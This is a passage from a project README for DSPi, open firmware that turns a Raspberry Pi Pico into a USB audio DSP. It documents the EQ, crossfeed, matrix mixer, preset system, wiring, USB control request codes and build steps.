01. **Input (USB):** 16-bit or 24-bit PCM stereo audio at 44.1, 48, or 96 kHz. Bit depth is selected via USB alt setting; sample rate via the USB Audio Class rate-set request.
02. **Per-Channel Preamp (PASS 1):** Independent gain control for the USB Left and Right input channels in dB. Applied at the very start of the DSP chain so its setting affects all downstream processing.
03. **Master EQ (PASS 2):** Up to 10 bands of parametric EQ per channel (Left/Right). Supports peaking, low shelf, high shelf, low pass, and high pass filter types.
04. **Volume Leveller (PASS 2.5):** Optional feedforward, stereo-linked, single-band RMS compressor with soft-knee upward compression — quieter content is boosted toward a target level while content above the threshold passes through untouched. Configurable speed, max-gain ceiling, and noise gate. Optional 10 ms lookahead. A -6 dBFS gain-reduction safety limiter prevents output overshoots.
05. **Headphone Crossfeed (PASS 3):** Optional BS2B crossfeed that mixes a filtered, delayed portion of each channel into the opposite channel. Uses a complementary filter design with interaural time delay (ITD) via an all-pass filter. Three presets (Default, Chu Moy, Jan Meier) plus custom frequency and feed level. ITD can be independently toggled. Master peak metering taps into this stage.
06. **Loudness Compensation:** Optional ISO 226:2003 equal-loudness EQ that adapts to the current volume level. At low volumes, bass and treble are boosted to compensate for the ear's reduced sensitivity. Configurable reference SPL and intensity. Driven by the USB host volume position so it remains correct regardless of master-volume attenuation downstream.
07. **Matrix Mixer (PASS 4):** Routes the two USB input channels (Left/Right) to all output channels. Each crosspoint has independent enable, gain (-inf to +12 dB), and phase invert. Outputs can be individually enabled/disabled to save CPU. RP2350 has a 2x9 matrix (9 outputs), RP2040 has a 2x5 matrix (5 outputs).
08. **Output EQ (PASS 5):** Independent 10-band EQ per output channel on both platforms. Ideal for crossover filters and per-driver correction. On RP2350, filters below Fs/7.5 use SVF topology for superior low-frequency accuracy; higher frequencies use traditional biquad.
09. **Per-Output Gain & Mute:** Independent gain (-inf to +12 dB) and mute for each output channel.
10. **Time Alignment:** Per-output delay for speaker alignment, up to 85 ms (4096 samples at 48 kHz). Automatic latency compensation between S/PDIF/I2S and PDM output paths.
11. **Master Volume:** Device-side output ceiling, -128 to 0 dB with a true-mute sentinel at -128. Folded into the per-output multiplier at PASS 5 so it's effectively free CPU-wise. Independent of the USB host volume — the two multiply together. Does not affect loudness-compensation behavior.
12. **Outputs:** Each numbered slot is configurable as either 24-bit S/PDIF or 24-bit I2S (left-justified, MSB-first). I2S slots share a common BCK/LRCLK clock pair (LRCLK is always BCK + 1 due to a PIO side-set constraint). An optional master clock (MCK) at 128× or 256× Fs can be routed to a separate GPIO. PDM subwoofer is always on its own dedicated output and pin.

* * *

## Hardware Setup

[](#hardware-setup)

### Flashing the Firmware

[](#flashing-the-firmware)

1. Download the latest `DSPi.uf2` release for your board.
2. Hold the **BOOTSEL** button on your Pico while plugging it into your computer.
3. A drive named `RPI-RP2` will appear.
4. Drag and drop the `.uf2` file onto this drive.
5. The Pico will reboot and appear as a "Weeb Labs DSPi" audio device.
6. Download and launch the DSPi Console application to control the DSPi.

### Wiring Guide

[](#wiring-guide)

**RP2350 (Pico 2) — up to 8 output pins:**

Function Pin Connection **Output Slot 0** (Out 1-2) `GPIO 6` (default) S/PDIF or I2S data for main L/R or multi-way pair 1 **Output Slot 1** (Out 3-4) `GPIO 7` (default) S/PDIF or I2S data for multi-way pair 2 **Output Slot 2** (Out 5-6) `GPIO 8` (default) S/PDIF or I2S data for multi-way pair 3 **Output Slot 3** (Out 7-8) `GPIO 9` (default) S/PDIF or I2S data for multi-way pair 4 **Subwoofer Out** (PDM, Out 9) `GPIO 10` (default) Active subwoofer or PDM-to-analog filter **I2S BCK** (shared, I2S only) `GPIO 14` (default) Bit clock for any slot configured as I2S **I2S LRCLK** (I2S only) `GPIO 15` (BCK + 1, fixed) Word/frame clock; always BCK + 1 **I2S MCK** (optional) `GPIO 13` (default) 128× or 256× Fs master clock when MCK is enabled **USB** `Micro-USB` Host device (PC/Mac/Mobile Device)

**RP2040 (Pico) — up to 6 output pins:**

Function Pin Connection **Output Slot 0** (Out 1-2) `GPIO 6` (default) S/PDIF or I2S data for main L/R or stereo pair 1 **Output Slot 1** (Out 3-4) `GPIO 7` (default) S/PDIF or I2S data for stereo pair 2 **Subwoofer Out** (PDM, Out 5) `GPIO 10` (default) Active subwoofer or PDM-to-analog filter **I2S BCK** (shared, I2S only) `GPIO 14` (default) Bit clock for any slot configured as I2S **I2S LRCLK** (I2S only) `GPIO 15` (BCK + 1, fixed) Word/frame clock; always BCK + 1 **I2S MCK** (optional) `GPIO 13` (default) 128× or 256× Fs master clock when MCK is enabled **USB** `Micro-USB` Host device (PC/Mac/Mobile Device)

> **Notes:** S/PDIF output requires either a Toshiba TX179 optical transmitter or a simple resistor divider. I2S output is a standard 24-bit-in-32-bit left-justified frame — wires straight into most I2S DACs. PDM output is a 1-bit logic signal that requires a resistor and capacitor to form a low-pass filter for conversion to analog audio.

### Custom Pin Assignments

[](#custom-pin-assignments)

All default pin assignments above work out of the box, but every output pin — including I2S BCK and MCK — can be reassigned at runtime through the DSPi Console application. No reflashing required. This is useful when designing custom PCBs or adapting to boards where the default GPIOs are inconvenient.

Pin assignments are saved to flash and restored automatically at boot. A few GPIOs are reserved and unavailable for output use: GPIO 12 (UART TX) and GPIOs 23-25 (power control and LED). LRCLK is always pinned to BCK + 1 due to a PIO side-set constraint.

[![Alt text](https://github.com/WeebLabs/DSPi/raw/main/Images/toslink.jpg)](https://github.com/WeebLabs/DSPi/blob/main/Images/toslink.jpg) [![Alt text](https://github.com/WeebLabs/DSPi/raw/main/Images/spdif_converter.jpg)](https://github.com/WeebLabs/DSPi/blob/main/Images/spdif_converter.jpg)

* * *

## DSP Features

[](#dsp-features)

### Matrix Mixer

[](#matrix-mixer)

The matrix mixer routes the USB stereo input to all output channels. RP2350 has a 2x9 matrix (9 outputs), RP2040 has a 2x5 matrix (5 outputs). Each crosspoint (input/output pair) has:

- **Enable/Disable:** Route active or inactive.
- **Gain:** -inf to +12 dB per crosspoint.
- **Phase Invert:** Polarity flip for driver alignment.

Each output channel also has:

- **Enable:** Disabled outputs skip all processing (EQ, delay, conversion) to save CPU.
- **Gain:** Per-output gain (-inf to +12 dB).
- **Mute:** Soft mute per output.
- **Delay:** Per-output time alignment.

**Output Availability:** Core 1 is shared between the PDM subwoofer modulator and the EQ worker that processes higher-numbered S/PDIF outputs. PDM and EQ worker modes are mutually exclusive:

**RP2350:**

Mode Available Outputs Core 1 Usage **PDM enabled** (Out 9 on) Out 1-2 (S/PDIF 1) + Out 9 (PDM) Delta-sigma modulator **PDM disabled** (Out 9 off) Out 1-8 (S/PDIF 1-4) EQ worker for Out 3-8

**RP2040:**

Mode Available Outputs Core 1 Usage **PDM enabled** (Out 5 on) Out 1-2 (S/PDIF 1) + Out 5 (PDM) Delta-sigma modulator **PDM disabled** (Out 5 off) Out 1-4 (S/PDIF 1-2) EQ worker for Out 3-4

When the PDM subwoofer is active, Core 1 is fully dedicated to the delta-sigma modulator, so higher-numbered S/PDIF outputs are unavailable. When PDM is off, Core 1 runs as an EQ worker processing those outputs in parallel with Core 0.

**Common Configurations (RP2350):**

Use Case Routing Mode Stereo + Sub L→Out1, R→Out2, L+R→Out9 PDM on (3 outputs) 2-Way Active L→Out1(tweeter), L→Out3(woofer), R→Out2(tweeter), R→Out4(woofer) PDM off (4 outputs) 3-Way Active As above, plus mid-range on Out5-6 PDM off (6 outputs) 4-Way Active As above, plus super-tweeter on Out7-8 PDM off (8 outputs)

**Common Configurations (RP2040):**

Use Case Routing Mode Stereo L→Out1, R→Out2 PDM off (2 outputs) Stereo + Sub L→Out1, R→Out2, L+R→Out5 PDM on (3 outputs) 2-Way Active L→Out1(tweeter), L→Out3(woofer), R→Out2(tweeter), R→Out4(woofer) PDM off (4 outputs)

### Parametric Equalization

[](#parametric-equalization)

Each filter band supports 6 types:

Type Description Flat Bypass (no processing) Peaking Parametric bell filter Low Shelf Low-frequency shelf High Shelf High-frequency shelf Low Pass Low-pass filter High Pass High-pass filter

On RP2040, all filters use biquad IIR (Transposed Direct Form II) with Q28 fixed-point arithmetic. On RP2350, the firmware uses a hybrid SVF/biquad architecture: filters below Fs/7.5 (~6.4 kHz at 48 kHz) use the Cytomic SVF (linear trapezoid) topology for superior numerical accuracy at low frequencies, while higher frequencies use traditional TDF2 biquad. All filters have configurable frequency, Q factor, and gain. Flat filters are automatically bypassed for zero CPU overhead.

**Channel Layout:**

**RP2350 (11 channels):**

Channel Index EQ Bands Master Left 0 10 Master Right 1 10 Output 1-8 (S/PDIF) 2-9 10 each Output 9 (PDM Sub) 10 10

**RP2040 (7 channels):**

Channel Index EQ Bands Master Left 0 10 Master Right 1 10 Output 1-4 (S/PDIF) 2-5 10 each Output 5 (PDM Sub) 6 10

### Loudness Compensation

[](#loudness-compensation)

Based on the ISO 226:2003 equal-loudness contour standard. At low listening volumes, the human ear is less sensitive to bass and treble frequencies. Loudness compensation applies a volume-dependent EQ curve to maintain perceived tonal balance across all listening levels.

- **Reference SPL:** Configurable (40-100 dB). Set this to the SPL where your system sounds tonally balanced at full volume.
- **Intensity:** Adjustable from 0-200% of the standard ISO curve.
- **Implementation:** Precomputed coefficient tables for all 91 volume steps, double-buffered for glitch-free updates.

### Headphone Crossfeed

[](#headphone-crossfeed)

Implements Bauer Stereophonic-to-Binaural (BS2B) crossfeed with a complementary filter design that reduces unnatural stereo separation for headphone listening. Each channel receives a lowpass-filtered, time-delayed mix of the opposite channel, simulating the acoustic crossfeed that occurs with loudspeaker listening.

- **Complementary Design:** Direct path = input - lowpass(input). Guarantees mono signals pass through at unity gain with no coloration.
- **Interaural Time Delay (ITD):** First-order all-pass filter adds ~220us of delay to the crossfeed path, modeling sound traveling around the head for 60-degree stereo speaker placement. ITD can be independently enabled/disabled.
- **Presets:**

Preset Cutoff Feed Level Character Default 700 Hz 4.5 dB Balanced, most popular Chu Moy 700 Hz 6.0 dB Stronger spatial effect Jan Meier 650 Hz 9.5 dB Subtle, natural Custom 500-2000 Hz 0-15 dB User-defined

### Volume Leveller

[](#volume-leveller)

A feedforward, stereo-linked, single-band RMS dynamic range compressor that maintains consistent perceived volume across content with varying loudness.

- **Upward compression:** Boosts content below the threshold while leaving content above the threshold completely untouched. No makeup gain needed.
- **RMS-based detection:** Tracks root-mean-square envelope, which correlates with perceived loudness better than peak detection.
- **Soft-knee:** Gradual transition between full boost and unity gain for transparent, artifact-free behavior.
- **Stereo-linked:** The louder of the two channels determines gain for both, preserving the stereo image.
- **Gain-reduction safety limiter:** -6 dBFS ceiling enforced via gain reduction (instant attack, 100 ms release) rather than hard clipping. Rarely engages since loud content passes through at unity.
- **Optional 10 ms lookahead** for smoother transitions.
- **Configurable:** speed (attack/release), max-gain ceiling (cap on how much quiet content can be lifted), and gate threshold (below which the leveller stops boosting to avoid amplifying silence/noise).

The leveller sits at PASS 2.5 — after Master EQ, before crossfeed. Independent of Loudness Compensation; both can be enabled together without conflict.

### Per-Channel Preamp

[](#per-channel-preamp)

Each USB input channel (Left and Right) has an independent preamp gain in dB, applied at PASS 1 before any other processing. Useful for trimming channel imbalance, attenuating hot inputs ahead of EQ, or matching levels across sources. A legacy single-value command remains for backward compatibility (sets both channels to the same value).

### Master Volume

[](#master-volume)

A device-side output ceiling applied at the very end of the signal chain, independent of USB host volume.

- **Range:** -128 to 0 dB. -128 is a sentinel for true silence (mute).
- **Independent of USB host volume:** the two multiply together. The host slider operates within whatever range master volume permits.
- **Independent of DSP processing:** loudness compensation, EQ, leveller, and crossfeed are all driven by the raw USB volume, not the master volume — their behavior is unchanged regardless of the master setting.
- **Two persistence modes** (selectable at runtime, persists across reboots):
  
  - **Mode 0 — Independent (default).** Master volume is a stand-alone device setting. The app calls a save command to capture the current value into the directory; that value is applied at every subsequent boot. Preset save/load do not touch master volume — switching presets never moves the volume.
  - **Mode 1 — With preset.** Master volume is part of each preset. Saved with the preset, restored on preset load, like any other DSP parameter. Useful when different presets target speaker setups with different sensitivity / maximum-output requirements.
- **Default at first boot:** -20 dB (configurable via `MASTER_VOL_DEFAULT_DB` in firmware).

### I2S Output

[](#i2s-output)

Each output slot can be switched at runtime between S/PDIF (default) and I2S, independently per slot. A single device can drive a mix — e.g., slot 0 as I2S into a DAC chip, slot 1 as S/PDIF over Toslink to an external receiver, all from the same audio pipeline.

- **I2S format:** 24-bit data, left-justified, MSB-first, 32-bit frames. Drop-in to most standard I2S DACs (PCM5102, ES9038Q2M, etc.).
- **Shared clocks:** All I2S slots share a single BCK/LRCLK pair. LRCLK is always BCK + 1 (PIO side-set hardware constraint).
- **Optional MCK:** When enabled, a 128× or 256× Fs master clock is generated on a configurable GPIO. Required by some DACs that don't have an internal PLL. At 96 kHz, only 128× is selectable due to PIO clock-divisor limits.
- **Sample-aligned start:** I2S slots can be brought up together so multiple DACs stay phase-locked.

The DSP pipeline is identical for both output types — only the final encoding differs (BMC/NRZI for S/PDIF vs. raw left-justified PCM for I2S).

### Subwoofer PDM Output

[](#subwoofer-pdm-output)

The subwoofer output uses a high-performance software-defined delta-sigma modulator running on Core 1.

- **Modulation:** 2nd-Order Delta-Sigma
- **Oversampling Ratio:** 256x (12.288 MHz bit clock at 48 kHz)
- **Dither:** TPDF (Triangular Probability Density Function) with noise shaping
- **DC Protection:** Leaky integrator design preventing DC offset accumulation

The objective was to use as much of Core 1 as necessary to produce an output that could be used full-range while sounding perfectly fine, even if it will only be used to feed a subwoofer. This implementation is very stable and without pops, clicks or idle tones.

* * *

## User Presets

[](#user-presets)

DSPi includes a 10-slot preset system that stores complete DSP configurations in flash. A preset is always active — there is no "no preset" state.

- **10 Preset Slots:** Each slot stores the full DSP state: per-channel preamp, EQ bands, delays, loudness, leveller, crossfeed, matrix mixer, output gains/mutes, output type (S/PDIF or I2S), I2S clock configuration, pin assignments, master volume (used in Mode 1), and per-channel names.
- **Per-Channel Names:** Each channel can be given a user-defined name (up to 31 characters) that is stored with the preset.
- **Startup Configuration:** Choose which preset loads on boot — either a specific default slot or whichever slot was last active.
- **Pin Config Inclusion:** Optionally include or exclude GPIO pin assignments when saving/loading presets (default: include — pin layout travels with the preset).
- **Master Volume Mode:** Selects whether master volume is part of each preset (Mode 1) or stored independently in the preset directory (Mode 0, default). See [Master Volume](#master-volume).
- **Preset-Switch Mute:** Audio output is briefly muted (~10 ms) during preset transitions to prevent audible glitches.
- **Legacy Commands:** The original save/load/reset commands (0x51-0x53) redirect through the preset system, operating on the currently active slot.
- **Bulk Parameter Transfer:** The complete DSP state can be read or written in a single USB control transfer (~2.9 KB) for fast synchronization with host applications.
- **Auto-Migration:** Older preset directories are upgraded transparently on first boot of new firmware — slot names, startup config, and other persisted state are preserved.

* * *

## Developer Reference

[](#developer-reference)

### System Architecture

[](#system-architecture)

- **Core 0:** USB communication, audio streaming, DSP processing (master EQ, crossfeed, loudness, matrix mixing, output EQ for S/PDIF pair 1), and control logic.
- **Core 1 (three modes):**
  
  - **PDM Mode:** Delta-sigma modulator for subwoofer output (when the PDM output is enabled).
  - **EQ Worker Mode:** Processes output EQ, delay, and S/PDIF conversion for higher-numbered outputs in parallel with Core 0. On RP2350: outputs 3-8. On RP2040: outputs 3-4. Activated when any of those outputs are enabled and PDM is disabled.
  - **Idle Mode:** When no outputs requiring Core 1 are enabled.
- **PIO & DMA:** Hardware offloading for S/PDIF encoding (PIO0) and PDM bitstream generation (PIO1) ensures zero CPU overhead for I/O.
- **Math Engine:**
  
  - **RP2040:** 32-bit fixed-point (Q28) processing with hand-optimized ARM assembly for the inner DSP loop.
  - **RP2350:** Single-precision float pipeline with hardware FPU. Hybrid SVF/biquad EQ — Cytomic SVF for low frequencies (below Fs/7.5), TDF2 biquad above. SVF provides superior numerical accuracy for low-frequency filters where biquad coefficient quantization becomes problematic.

> **Note:** PDM mode and EQ Worker mode are mutually exclusive on Core 1. When the PDM output is enabled, Core 0 handles all S/PDIF output EQ processing. When PDM is disabled and higher-numbered outputs are active, Core 1 runs as an EQ worker for those outputs.

### Performance Tuning

[](#performance-tuning)

Both platforms run at a fixed 307.2 MHz system clock (VCO 1536 MHz / 5 / 1) so PIO dividers stay integer at every supported sample rate, eliminating sample-rate-dependent clock switching glitches.

Platform System Clock Core Voltage **RP2040** 307.2 MHz (overclock) 1.15 V **RP2350** 307.2 MHz 1.15 V

The RP2040 reaches 307.2 MHz with a slight voltage bump above the 1.10 V nominal; the RP2350 is comfortable at the same voltage at this clock. The voltage step is applied before the frequency change. Sample rate changes do not retune the system clock, only the PIO dividers, so transitions between 44.1 / 48 / 96 kHz are seamless.

Flash access is also tuned: `PICO_FLASH_SPI_CLKDIV` is set to 6 to keep XIP and erase/program operations safely below the W25Q080's 104–133 MHz spec at this clock. On the RP2350, runtime QMI register management is handled by `firmware/DSPi/flash_clkdiv.c` since the bootrom does not honor the boot2 setting on that platform.

### USB Control Protocol

[](#usb-control-protocol)

Configuration is performed via **Interface 2** (Vendor Interface) using Control Transfers under Windows and via **Interface 0** under macOS. The device supports WinUSB/WCID for automatic driverless installation on Windows.

**Request Table**

Code Name Direction Payload Description `0x42` `REQ_SET_EQ_PARAM` OUT 16 bytes Upload filter parameters `0x43` `REQ_GET_EQ_PARAM` IN 16 bytes Read filter parameters `0x44` `REQ_SET_PREAMP` OUT 4 bytes Set global gain (float dB) `0x45` `REQ_GET_PREAMP` IN 4 bytes Get global gain `0x46` `REQ_SET_BYPASS` OUT 1 byte Bypass Master EQ (1=On, 0=Off) `0x47` `REQ_GET_BYPASS` IN 1 byte Get bypass state `0x48` `REQ_SET_DELAY` OUT 4 bytes Set channel delay (float ms) `0x49` `REQ_GET_DELAY` IN 4 bytes Get channel delay `0x50` `REQ_GET_STATUS` IN 4-12 bytes Get system statistics (wValue selects field) `0x51` `REQ_SAVE_PARAMS` IN 1 byte Save to active preset slot `0x52` `REQ_LOAD_PARAMS` IN 1 byte Reload active preset slot `0x53` `REQ_FACTORY_RESET` IN 1 byte Reset live state to defaults `0x54` `REQ_SET_CHANNEL_GAIN` OUT 4 bytes Set output channel gain (float dB) `0x55` `REQ_GET_CHANNEL_GAIN` IN 4 bytes Get output channel gain `0x56` `REQ_SET_CHANNEL_MUTE` OUT 1 byte Mute output channel (1=Muted) `0x57` `REQ_GET_CHANNEL_MUTE` IN 1 byte Get mute state `0x58` `REQ_SET_LOUDNESS` OUT 1 byte Enable/disable loudness (1=On) `0x59` `REQ_GET_LOUDNESS` IN 1 byte Get loudness state `0x5A` `REQ_SET_LOUDNESS_REF` OUT 4 bytes Set reference SPL (float, 40-100) `0x5B` `REQ_GET_LOUDNESS_REF` IN 4 bytes Get reference SPL `0x5C` `REQ_SET_LOUDNESS_INTENSITY` OUT 4 bytes Set intensity % (float, 0-200) `0x5D` `REQ_GET_LOUDNESS_INTENSITY` IN 4 bytes Get intensity `0x5E` `REQ_SET_CROSSFEED` OUT 1 byte Enable/disable crossfeed (1=On) `0x5F` `REQ_GET_CROSSFEED` IN 1 byte Get crossfeed state `0x60` `REQ_SET_CROSSFEED_PRESET` OUT 1 byte Set preset (0-3) `0x61` `REQ_GET_CROSSFEED_PRESET` IN 1 byte Get current preset `0x62` `REQ_SET_CROSSFEED_FREQ` OUT 4 bytes Set custom frequency (float Hz, 500-2000) `0x63` `REQ_GET_CROSSFEED_FREQ` IN 4 bytes Get custom frequency `0x64` `REQ_SET_CROSSFEED_FEED` OUT 4 bytes Set custom feed level (float dB, 0-15) `0x65` `REQ_GET_CROSSFEED_FEED` IN 4 bytes Get custom feed level `0x66` `REQ_SET_CROSSFEED_ITD` OUT 1 byte Enable/disable ITD (1=On) `0x67` `REQ_GET_CROSSFEED_ITD` IN 1 byte Get ITD state `0x70` `REQ_SET_MATRIX_ROUTE` OUT 8 bytes Set matrix crosspoint (MatrixRoutePacket) `0x71` `REQ_GET_MATRIX_ROUTE` IN 8 bytes Get matrix crosspoint `0x72` `REQ_SET_OUTPUT_ENABLE` OUT 1 byte Enable/disable output channel `0x73` `REQ_GET_OUTPUT_ENABLE` IN 1 byte Get output enable state `0x74` `REQ_SET_OUTPUT_GAIN` OUT 4 bytes Set per-output gain (float dB) `0x75` `REQ_GET_OUTPUT_GAIN` IN 4 bytes Get per-output gain `0x76` `REQ_SET_OUTPUT_MUTE` OUT 1 byte Mute output (1=Muted) `0x77` `REQ_GET_OUTPUT_MUTE` IN 1 byte Get output mute state `0x78` `REQ_SET_OUTPUT_DELAY` OUT 4 bytes Set per-output delay (float ms) `0x79` `REQ_GET_OUTPUT_DELAY` IN 4 bytes Get per-output delay `0x7A` `REQ_GET_CORE1_MODE` IN 1 byte Get Core 1 mode (0=Idle, 1=PDM, 2=EQ Worker) `0x7B` `REQ_GET_CORE1_CONFLICT` IN 1 byte Check if PDM vs EQ Worker conflict exists `0x7C` `REQ_SET_OUTPUT_PIN` IN 1 byte Change output GPIO pin (returns status) `0x7D` `REQ_GET_OUTPUT_PIN` IN 1 byte Get current GPIO pin for an output `0x7E` `REQ_GET_SERIAL` IN variable Get unique board serial number `0x7F` `REQ_GET_PLATFORM` IN 1 byte Get platform ID (0=RP2040, 1=RP2350) `0x83` `REQ_CLEAR_CLIPS` OUT — Clear clip detection latches `0x90` `REQ_PRESET_SAVE` IN 1 byte Save live state to preset slot (wValue=slot) `0x91` `REQ_PRESET_LOAD` IN 1 byte Load preset slot to live state (wValue=slot) `0x92` `REQ_PRESET_DELETE` IN 1 byte Delete preset slot (wValue=slot) `0x93` `REQ_PRESET_GET_NAME` IN 32 bytes Get preset name (wValue=slot) `0x94` `REQ_PRESET_SET_NAME` OUT 32 bytes Set preset name (wValue=slot) `0x95` `REQ_PRESET_GET_DIR` IN variable Get preset directory (occupancy, startup config) `0x96` `REQ_PRESET_SET_STARTUP` OUT 2 bytes Set startup mode and default slot `0x97` `REQ_PRESET_GET_STARTUP` IN 2 bytes Get startup configuration `0x98` `REQ_PRESET_SET_INCLUDE_PINS` OUT 1 byte Set pin config inclusion (1=include) `0x99` `REQ_PRESET_GET_INCLUDE_PINS` IN 1 byte Get pin config inclusion setting `0x9A` `REQ_PRESET_GET_ACTIVE` IN 1 byte Get currently active preset slot index `0x9B` `REQ_SET_CHANNEL_NAME` OUT 32 bytes Set channel name (wValue=channel) `0x9C` `REQ_GET_CHANNEL_NAME` IN 32 bytes Get channel name (wValue=channel) `0xA0` `REQ_GET_ALL_PARAMS` IN ~2896 bytes Bulk read entire DSP state (multi-packet) `0xA1` `REQ_SET_ALL_PARAMS` OUT ~2896 bytes Bulk write entire DSP state (multi-packet) `0xB0` `REQ_GET_BUFFER_STATS` IN variable Read buffer fill statistics `0xB1` `REQ_RESET_BUFFER_STATS` IN 1 byte Reset buffer statistics counters `0xB2` `REQ_GET_USB_ERROR_STATS` IN 24 bytes Read USB PHY error counters (CRC/bit-stuff/timeout/overflow/seq) `0xB3` `REQ_RESET_USB_ERROR_STATS` IN 1 byte Reset USB PHY error counters `0xB4` `REQ_SET_LEVELLER_ENABLE` OUT 1 byte Enable/disable Volume Leveller `0xB5` `REQ_GET_LEVELLER_ENABLE` IN 1 byte Get leveller enable state `0xB6` `REQ_SET_LEVELLER_AMOUNT` OUT 4 bytes Set leveller target/amount (float) `0xB7` `REQ_GET_LEVELLER_AMOUNT` IN 4 bytes Get leveller amount `0xB8` `REQ_SET_LEVELLER_SPEED` OUT 1 byte Set leveller attack/release speed `0xB9` `REQ_GET_LEVELLER_SPEED` IN 1 byte Get leveller speed `0xBA` `REQ_SET_LEVELLER_MAX_GAIN` OUT 4 bytes Set max upward gain (float dB) `0xBB` `REQ_GET_LEVELLER_MAX_GAIN` IN 4 bytes Get max upward gain `0xBC` `REQ_SET_LEVELLER_LOOKAHEAD` OUT 1 byte Enable/disable 10 ms lookahead `0xBD` `REQ_GET_LEVELLER_LOOKAHEAD` IN 1 byte Get lookahead state `0xBE` `REQ_SET_LEVELLER_GATE` OUT 4 bytes Set noise-gate threshold (float dB) `0xBF` `REQ_GET_LEVELLER_GATE` IN 4 bytes Get noise-gate threshold `0xC0` `REQ_SET_OUTPUT_TYPE` OUT 1 byte Set slot output type (0=S/PDIF, 1=I2S; wValue=slot) `0xC1` `REQ_GET_OUTPUT_TYPE` IN 1 byte Get slot output type (wValue=slot) `0xC2` `REQ_SET_I2S_BCK_PIN` OUT 1 byte Set shared I2S BCK GPIO (LRCLK auto = BCK + 1) `0xC3` `REQ_GET_I2S_BCK_PIN` IN 1 byte Get current I2S BCK pin `0xC4` `REQ_SET_MCK_ENABLE` OUT 1 byte Enable/disable I2S master clock output `0xC5` `REQ_GET_MCK_ENABLE` IN 1 byte Get MCK enable state `0xC6` `REQ_SET_MCK_PIN` OUT 1 byte Set MCK GPIO `0xC7` `REQ_GET_MCK_PIN` IN 1 byte Get MCK GPIO `0xC8` `REQ_SET_MCK_MULTIPLIER` OUT 1 byte Set MCK multiplier (0=128×, 1=256×) `0xC9` `REQ_GET_MCK_MULTIPLIER` IN 1 byte Get MCK multiplier `0xD0` `REQ_SET_PREAMP_CH` OUT 4 bytes Set per-channel preamp (wValue=channel, payload=float dB) `0xD1` `REQ_GET_PREAMP_CH` IN 4 bytes Get per-channel preamp (wValue=channel) `0xD2` `REQ_SET_MASTER_VOLUME` OUT 4 bytes Set master volume (-128 mute sentinel, -127..0 dB) `0xD3` `REQ_GET_MASTER_VOLUME` IN 4 bytes Get current live master volume `0xD4` `REQ_SET_MASTER_VOLUME_MODE` OUT 1 byte Set persistence mode (0=independent, 1=with preset) `0xD5` `REQ_GET_MASTER_VOLUME_MODE` IN 1 byte Get persistence mode `0xD6` `REQ_SAVE_MASTER_VOLUME` IN 1 byte Save live master volume to directory (mode 0 persistence) `0xD7` `REQ_GET_SAVED_MASTER_VOLUME` IN 4 bytes Read directory's saved master-volume value `0xF0` `REQ_ENTER_BOOTLOADER` IN 1 byte Reboot into UF2 bootloader for firmware update

### REQ\_GET\_STATUS (0x50) - System Telemetry

[](#req_get_status-0x50---system-telemetry)

The `REQ_GET_STATUS` request returns data based on the `wValue` field:

wValue Returns Description `0` uint32 Peaks for channels 0-1 (packed 16-bit values) `1` uint32 Peaks for channels 2-3 (packed 16-bit values) `2` uint32 Peak for channel 4 + CPU0/CPU1 load (packed) `3` uint32 PDM ring buffer overruns `4` uint32 PDM ring buffer underruns `5` uint32 PDM DMA overruns `6` uint32 PDM DMA underruns `7` uint32 S/PDIF overruns `8` uint32 S/PDIF underruns `9` 12 bytes Combined: all 5 peaks + CPU loads `10` uint32 USB audio packet count `11` uint32 USB alt setting `12` uint32 USB audio mounted state `13` uint32 System clock frequency (Hz) `14` uint32 Core voltage (millivolts) `15` uint32 Sample rate (Hz) `16` int32 System temperature (centi-degrees C) `17` uint32 Total S/PDIF DMA starvations (all slots combined) `18` uint32 S/PDIF slot 0 starvations (Out 1-2) `19` uint32 S/PDIF slot 1 starvations (Out 3-4) `20` uint32 S/PDIF slot 2 starvations (Out 5-6, RP2350) `21` uint32 S/PDIF slot 3 starvations (Out 7-8, RP2350)

A starvation event means the S/PDIF DMA needed a buffer but the consumer pool was empty, so the firmware substituted a silence buffer for that transfer. This is a more direct output-side dropout signal than the older `spdif_underruns` USB-packet-gap heuristic.

### Data Structures

[](#data-structures)

**Filter Packet (16 bytes):**

```
struct __attribute__((packed)) {
    uint8_t channel;  // RP2350: 0-10, RP2040: 0-6
    uint8_t band;     // 0-9
    uint8_t type;     // 0=Flat, 1=Peak, 2=LS, 3=HS, 4=LP, 5=HP
    uint8_t reserved;
    float freq;       // Hz
    float Q;
    float gain_db;
}
```

**Matrix Route Packet (8 bytes):**

```
struct __attribute__((packed)) {
    uint8_t input;          // 0-1 (USB L/R)
    uint8_t output;         // RP2350: 0-8, RP2040: 0-4
    uint8_t enabled;        // 0 or 1
    uint8_t phase_invert;   // 0 or 1
    float gain_db;          // -inf to +12dB
}
```

### Runtime Pin Configuration

[](#runtime-pin-configuration)

Output GPIO pins can be reassigned at runtime without reflashing. This is useful for custom PCB layouts or when the default pin assignments conflict with other hardware.

**`REQ_SET_OUTPUT_PIN` (0x7C)** — IN transfer, returns 1-byte status:

- `wValue` = `(new_pin << 8) | output_index`
- RP2350: `output_index` 0-3 for S/PDIF outputs 1-4, 4 for PDM subwoofer
- RP2040: `output_index` 0-1 for S/PDIF outputs 1-2, 2 for PDM subwoofer
- S/PDIF outputs are automatically disabled and re-enabled during the pin change (~1ms audio dropout on that output only)
- PDM output must be disabled first (disable via `REQ_SET_OUTPUT_ENABLE`), otherwise returns `PIN_CONFIG_OUTPUT_ACTIVE`

Status Code Value Meaning `PIN_CONFIG_SUCCESS` 0x00 Pin changed successfully `PIN_CONFIG_INVALID_PIN` 0x01 Pin out of range or reserved (GPIO 12, 23-25) `PIN_CONFIG_PIN_IN_USE` 0x02 Pin already assigned to another output `PIN_CONFIG_INVALID_OUTPUT` 0x03 Output index out of range `PIN_CONFIG_OUTPUT_ACTIVE` 0x04 PDM output must be disabled before changing its pin

**`REQ_GET_OUTPUT_PIN` (0x7D)** — IN transfer, returns 1 byte:

- `wValue` = output\_index
- Returns the current GPIO pin number for that output

Pin assignments are stored in each preset and can optionally be included during preset save/load (controlled via `REQ_PRESET_SET_INCLUDE_PINS`).

* * *

## Building from Source

[](#building-from-source)

To build the firmware yourself, you'll need a standard Raspberry Pi Pico C/C++ development environment.

### 1. Install Prerequisites

[](#1-install-prerequisites)

Ensure you have the following tools installed:

- **CMake** (3.13 or newer)
- **Arm GNU Toolchain** (`arm-none-eabi-gcc`, etc.)
- **Python 3** (for Pico SDK scripts)
- **Git**

### 2. Clone the Repository

[](#2-clone-the-repository)

Clone the project recursively to include the Pico SDK and other submodules:

```
git clone --recursive https://github.com/WeebLabs/DSPi.git
cd DSPi
```

*If you already cloned without `--recursive`, run:*

```
git submodule update --init --recursive
```

